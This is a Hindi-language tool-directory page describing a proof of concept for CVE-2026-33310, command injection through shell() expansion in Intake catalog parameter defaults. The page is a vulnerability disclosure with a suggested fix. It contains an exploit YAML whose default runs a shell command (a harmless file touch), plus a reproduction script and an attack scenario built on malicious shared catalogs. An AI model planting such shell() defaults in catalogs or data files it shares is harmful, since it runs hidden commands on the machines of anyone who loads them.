Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33310 — प्रूफ-ऑफ-कॉन्सेप्ट जो Intake कैटलॉग के पैरामीटर डिफ़ॉल्ट में shell() विस्तार के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है, साथ में एक्सप्लॉइट YAML और प्रजनन स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/redyank/cve-2026-33310
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब सुरक्षाकमांड एंड कंट्रोल
GitHubredyank/cve-2026-33310

CVE-2026-33310

प्रूफ-ऑफ-कॉन्सेप्ट जो Intake कैटलॉग के पैरामीटर डिफ़ॉल्ट में shell() विस्तार के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है, साथ में एक्सप्लॉइट YAML और प्रजनन स्क्रिप्ट।

रिपॉजिटरी देखें
1256 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33310

CVE-2026-33310 (पैरामीटर डिफ़ॉल्ट में shell() विस्तार के माध्यम से कमांड इंजेक्शन)

सारांश

पैरामीटर डिफ़ॉल्ट मानों के भीतर shell() सिंटैक्स कैटलॉग पार्सिंग प्रक्रिया के दौरान स्वचालित रूप से विस्तारित होता प्रतीत होता है। यदि किसी कैटलॉग में shell() जैसा पैरामीटर डिफ़ॉल्ट शामिल है, तो कैटलॉग स्रोत तक पहुँचने पर कमांड निष्पादित हो सकती है। इसका अर्थ है कि यदि कोई उपयोगकर्ता दुर्भावनापूर्ण कैटलॉग YAML लोड करता है, तो एम्बेडेड कमांड होस्ट सिस्टम पर निष्पादित हो सकती हैं। यह व्यवहार संभावित रूप से CWE-78: OS कमांड इंजेक्शन / असुरक्षित शेल विस्तार के रूप में वर्गीकृत किया जा सकता है।

विवरण

समस्या उत्पन्न होती प्रतीत होती है कि कैटलॉग स्रोत तक पहुँचने पर पैरामीटर डिफ़ॉल्ट मानों का विस्तार कैसे किया जाता है।

कैटलॉग लोडिंग और स्रोत पहुँच के दौरान:

Intake पैरामीटर डिफ़ॉल्ट मानों को हल करता है डिफ़ॉल्ट विस्तार के लिए जिम्मेदार फ़ंक्शन shell() सिंटैक्स को संसाधित करता है शेल एक्सप्रेशन एक सबप्रोसेस निष्पादन को ट्रिगर करता है क्योंकि यह कैटलॉग मूल्यांकन के दौरान होता है, उपयोगकर्ता द्वारा डेटासेट के साथ स्पष्ट रूप से इंटरैक्ट करने से पहले ही कमांड निष्पादित हो सकती है।

प्रभावित तर्क में निम्न शामिल प्रतीत होता है:

expand_defaults()

और संबंधित पैरामीटर पार्सिंग तंत्र।

PoC

exploit.yaml

metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Testing shell expansion in parameters"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Test Parameter"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accessing source...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Error during execution: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Command execution confirmed, Found: {PROOF_FILE}")
else:
    print("Command execution did not occur.")

हमले का परिदृश्य

एक संभावित हमले का परिदृश्य इस प्रकार हो सकता है:

  1. एक हमलावर एक दुर्भावनापूर्ण Intake कैटलॉग YAML फ़ाइल प्रकाशित करता है
  2. पीड़ित कैटलॉग डाउनलोड या लोड करता है
  3. पीड़ित कैटलॉग में एक स्रोत प्रविष्टि तक पहुँचता है
  4. पैरामीटर डिफ़ॉल्ट विस्तारित होते हैं
  5. shell() एक्सप्रेशन एम्बेडेड कमांड के निष्पादन को ट्रिगर करता है

प्रभाव

यदि यह व्यवहार अनपेक्षित होने की पुष्टि होती है, तो एक हमलावर निम्न माध्यम से दुर्भावनापूर्ण कैटलॉग फ़ाइल वितरित कर सकता है:

  • Git रिपॉजिटरी
  • साझा डेटासेट
  • URL
  • डेटा विज्ञान वर्कफ़्लो
  • कैटलॉग लोड करने वाला कोई भी उपयोगकर्ता अपने स्थानीय उपयोगकर्ता विशेषाधिकारों के साथ अनजाने में कमांड निष्पादित कर सकता है।

अनुशंसा

संभावित शमन उपायों में शामिल हो सकते हैं:

  • डिफ़ॉल्ट रूप से shell() विस्तार को अक्षम करना
  • एक स्पष्ट ऑप्ट-इन फ़्लैग की आवश्यकता (जैसे, allow_shell=True)
  • अविश्वसनीय स्रोतों से लोड किए गए कैटलॉग के लिए शेल निष्पादन को प्रतिबंधित करना कृपया मुझे बताएं यदि अतिरिक्त जानकारी या परीक्षण की आवश्यकता है। मैं आगे के विश्लेषण या सत्यापन में सहायता करने में प्रसन्न हूं।
टूल डाउनलोड करें